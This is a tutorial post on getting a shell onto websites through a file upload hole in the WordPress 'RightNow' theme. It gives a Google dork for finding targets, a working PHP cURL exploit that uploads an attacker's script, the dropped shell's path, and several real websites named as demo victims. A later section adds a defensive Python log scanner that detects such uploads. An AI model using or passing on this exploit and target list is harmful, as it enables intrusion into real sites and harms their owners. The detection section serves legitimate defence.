WordPress Right Now theme - Arbitrary File Upload Vulnerability

Here's a short tutorial. I'm going to show how to get a shell onto a website. Some of you probably know this already; this is for those who don't. There's no harm in trying it out, but using the three names Elite_x, Cryp70n and www.synkoda.com is forbidden.

Here's the video.



###############################################################
# Exploit Title: WordPress Right Now theme - Arbitrary File Upload Vulnerability
# Author: Cryp70n
# Date: 10/31/2013
# Category: webapps/php
# Google dork: inurl:wp-content/themes/RightNow/
###############################################################
= = = = = = = =
1)Exploit =
2)Real Demo = http://monroemartincomedy.com//wp-conten...index.html
= = = = = = = =

1)Exploit :
= = = = = = 
<?php
$uploadfile="YourFile.php";
$ch = curl_init("http://[Target]/rightnowwp/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>

2) Exploit demo :
= = = = = = = = =
http://brainframe.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://swedishhousemafia.it/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php
http://www.iteva.co/wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php

# #### #### #### #### #### #### #### #### #
Shell Path : http://[Target]/wp-content/uploads/settingsimages/YourFile.php
# #### #### #### #### #### #### #### #### #
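
For site owners, the two paths in the advisory above are what to look for in web server access logs: a POST to the theme's upload handler, and any request for a script under uploads/settingsimages/. The Python below is an added example, not part of the original post; the log lines are constructed and the Apache/nginx "combined" log format is an assumption.

```python
import re
from urllib.parse import unquote

# Paths from the advisory; case-insensitive, works for subdirectory installs.
UPLOAD_RE = re.compile(
    r"/wp-content/themes/RightNow/includes/uploadify/upload_settings_image\.php$", re.I)
DROPPED_RE = re.compile(
    r"/wp-content/uploads/settingsimages/[^/]+\.(?:php\d?|phtml|phar)$", re.I)
# Apache/nginx "combined" log format: ip, timestamp, method, URI, status.
LINE_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "([A-Z]+) (\S+)[^"]*" (\d{3}) ')

# Constructed sample log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Nov/2013:10:00:01 +0000] "GET /wp-content/themes/RightNow/style.css HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Nov/2013:10:02:13 +0000] "POST /wp-content/themes/RightNow/includes/uploadify/upload_settings_image.php HTTP/1.1" 200 31 "-" "-"
198.51.100.7 - - [01/Nov/2013:10:02:20 +0000] "GET /wp-content/uploads/settingsimages/YourFile.php?x=1 HTTP/1.1" 200 812 "-" "-"
192.0.2.10 - - [01/Nov/2013:10:05:44 +0000] "GET /wp-content/uploads/settingsimages/logo.png HTTP/1.1" 200 20480 "-" "Mozilla/5.0"
203.0.113.9 - - [01/Nov/2013:10:09:02 +0000] "GET /wp-content/uploads/settingsimages/YourFile.php HTTP/1.1" 404 210 "-" "-"
"""

def scan(log_text):
    """Return findings as dicts with ip, time, kind, path, status."""
    findings = []
    uploaders = set()  # clients that POSTed to the upload handler
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, when, method, uri, status = m.groups()
        path = unquote(uri.split("?", 1)[0])  # drop query string, decode %xx
        if method == "POST" and UPLOAD_RE.search(path):
            kind = "upload-handler-post"
            uploaders.add(ip)
        elif DROPPED_RE.search(path):
            # Worst case: same client uploaded earlier and the server answered 2xx.
            if ip in uploaders and status.startswith("2"):
                kind = "script-served-after-upload"
            else:
                kind = "script-request-in-upload-dir"
        else:
            continue
        findings.append({"ip": ip, "time": when, "kind": kind,
                         "path": path, "status": int(status)})
    return findings

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['time']}  {f['ip']:<15} {f['kind']:<30} {f['status']} {f['path']}")
```

A `script-served-after-upload` finding means the upload directory on disk should be inspected; image requests such as `logo.png` are ignored.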


So tell us what you think, good or bad, and leave a comment before you go. Don't forget to subscribe to the channel either.